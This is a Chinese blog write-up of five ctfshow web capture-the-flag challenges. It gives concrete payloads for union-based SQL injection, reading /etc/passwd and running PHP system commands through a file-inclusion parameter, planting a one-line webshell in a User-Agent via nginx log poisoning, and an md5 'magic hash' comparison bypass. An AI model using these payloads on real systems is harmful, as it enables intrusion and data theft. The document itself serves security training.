ctfshow web

最新推荐文章于 2024-03-18 19:26:17 发布
最新推荐文章于 2024-03-18 19:26:17 发布
阅读量831 收藏
点赞数
文章标签: 网络 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73239569/article/details/129338696
版权

1.web签到题

打开之后按F12查看源码

看着一串编码向base64,然后试一下解码得到flag

2.web2:SQL注入漏洞(联合查询)

SQL注入详细内容点这里

先输入万能密码1'or 1=1 #

回显成功

联合查询(union select)

1' union select 1,2,3#:从1试到3发现有三个字段,而且发现回显的位置是第二个

查表1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

查询flag表的字段名1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='flag'#

此处flag为字段名

取数据:1' union select 1,flag,3 from flag#,得到flag

3.web3

测试/?url=/etc/passwd回显成功

查询当前目录下的文件结构

/?url=data://text/plain,<?php print_r(glob("*")); ?>

之后在查一下

查看ctf_go_go_go文件

/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?>

就会得到flag

4.web4

考点:日志注入

web3的升级,过滤了php伪协议,使用日志注入

访问/var/log/nginx/access.log可以查看到我们输入的参数记录

在user-agent种写入一句话木马

因为日志文件中的代码会被执行。

然后用蚁剑连接(连接目标:http://xxx/?url=/var/log/nginx/access.log)在www目录下找到flag.txt

5.web5

where is flag?

<?php

error_reporting(0);

?>

<html lang="zh-CN">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />

<title>ctf.show_web5</title>

</head>

<body>

<center>

<h2>ctf.show_web5</h2>

<hr>

<h3>

</center>

<?php

$flag="";

$v1=$_GET['v1'];

$v2=$_GET['v2'];

if(isset($v1) && isset($v2)){

if(!ctype_alpha($v1)){

die("v1 error");

}

if(!is_numeric($v2)){

die("v2 error");

}

if(md5($v1)==md5($v2)){

echo $flag;

}

}else{

echo "where is flag?";

}

?>

</body>

  • 代码审计:输入v1,v2的值,使两者的md5值0e开头,在PHP中0e会被当做科学计数法,最后以0做处理,结果相等,成功绕过,而且v1为字符,v2为数字

输入/?v1=QNKCDZO&v2=240610708

然后得到flag。

继续学吧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTFshow 每日一练
m0_73867210的博客
01-02 520
一、web签到题 打开链接 查看源码 利用base64解码得到flag 二、web2 看到有提示--SQL注入 先试着使用万能密码登陆 发现有回显,直接sql注入 ' or 1=1 order by 3# 发现到4时不回显 开始爆库名,看看哪个位置会回显 ' or 1=1 union select 1,2,3# ' or 1=1 union select 1,database(),3# 得到库名:web2,爆表名 ' or 1
CTFshow-菜狗杯-web签到
qq_31415417的博客
12-06 3190
CTFshow参数传递的获取、url编码、eval命令执行 解题思路 先是cookie传参再是POST传参再是GET传参再是REQUEST传参最后是eval命令执行分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016构造payload 得到flag
2024腾龙杯web签到题-初识jwt(签到:这是一个登录页面)
最新发布
Welcome To Myon'Blog !
03-18 692
它是 JSON Web Token 的缩写,是一个开放标准,定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息,该信息可以被验证和信任,因为它是数字签名的。它就是一种认证机制,让后台知道该请求是来自于受信的客户端。jwt 由三部分组成,它们之间用圆点(.)连接,这三部分分别是:Header、Payload、Signature。回到最初请求的 login , post 传入 json 格式的 tooken。回显得到一个 token ,也是 json 的格式。
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1111
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
Web10道签到
网安菜鸡学习笔记
02-03 152
题目1 万能密码 题目2 弱口令 admin 123456登录后台,文件管理上传<?php system('cat /tmp/flag');?> 题目3 题目4 F12发现include.phpinclude.php?file=php://filter/read=convert.base64-encode/resource=include.php 查看文件源码,发现upload....
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
CTFshow-web -入门签到
pone2233的博客
12-15 1445
CTFshow Web web签到题 F12 web2 先抓包然后按照流程跑 把之前抓取的数据复制到sqlmap根目录下test.txt内 保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlmap.py -r test.txt -D web2 --tables 查看字段 python2 sqlmap.py -r test.txt -D web2 -T flag --columns [ 查询字段内容 p
CTFshow 1-10关
weixin_62369433的博客
11-11 2123
CTFshow 1-10 通关详解
ctf.show 通关秘籍
qq_37970270的博客
09-13 1341
@ CTF.show 1.web签到题 访问web签到题的地址,发现页面只有"where is flag"字样 使用Fn+F12进入调试模式,或者页面空白处点击右键查看网页源代码,发现页面中有一段英文字符串被注释了,根据编码规则猜测使用的是base64的加密方式。 使用解码平台尝试解码,示例使用站长之家,成功获取到flag。(url:http://tool.chinaz.com/tools/base64.aspx) ...
11月11号考核
weixin_74328163的博客
11-19 380
直接给它换个方式打开,撇到浏览器里面,右键点个全选都有一串蓝色的。复制粘贴到别的地方就ok了。就可以得到flag了。可以得到提瓦特大陆密码,可以一个一个对照就可以翻译出flag。无非让我们去修改这个图片的高度从而得到flag。图片闪动截图flag,拼手速。图片提取文字就可以得到flag了。利用ctrl+f键文本搜索flag形式。就可以直接得到flag。这个图片上都注释了我可以假装看不见。下载完文件直接将其扔到010里面。将文本放入其中可以直接得到flag。可以直接领悟熊说的话。直接浏览器搜索熊曰。
ctfshow-WEB-web1签到
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
CTFweb篇——签到
热门推荐
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到题。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过题目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response中 Headers 找到Flag ok完成。 ...
CTFSHOW WEB_AK赛
羽的博客
07-31 3013
签到_观己 既然是签到,那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束 如果猜不到呢,我们只能另寻他法了 1、尝试用伪协议中的data(具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043)发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话。(其中日志中有客
刷题之旅第12站,CTFshow misc签到
cc菜的一批
02-15 2857
感谢CTF show平台提供题目 下载得到文件后,思路很明确,破解压缩包密码。 先讲一下,我做压缩包密码题目时的思路。 1、右键属性查看文件信息 2、 010 查看压缩包尾部是否有隐藏信息 3、 伪加密 4、 以上都不行的话,直接爆破 言归正传,当我们尝试解压文件的时候,提示错误。 那么,我猜测可能是出题人进行的伪加密,导致文件结构损坏。 打开010 editor ,搜索50 4B,在这里...
ctfshow WEB
09-20
ctf.show的WEB是一个CTF(Capture The Flag)赛事中的一个Web题目。根据提供的引用内容,可以看出这个题目涉及到了文件读取漏洞和命令注入漏洞。在第一个引用中,flag文件的路径被传递到了一个URL参数中,并且在源码中存在一个文件读取漏洞。在第二个引用中,源码中存在一个命令注入漏洞。而第三个引用则是在执行了一个命令highlight_file之后,将其结果作为参数传递给了一个文件读取函数。综合这些信息,可以得出以下结论: 1. 对于文件读取漏洞,攻击者可以通过构造恶意的URL参数来读取任意文件,甚至是敏感文件(如源代码文件、配置文件等)。 2. 对于命令注入漏洞,攻击者可以通过在用户输入中插入恶意命令来执行任意命令。 3. 在ctf.show这个Web题目中,可能存在其他安全漏洞,但需要进一步的信息才能做出准确的判断。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

继续学吧

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值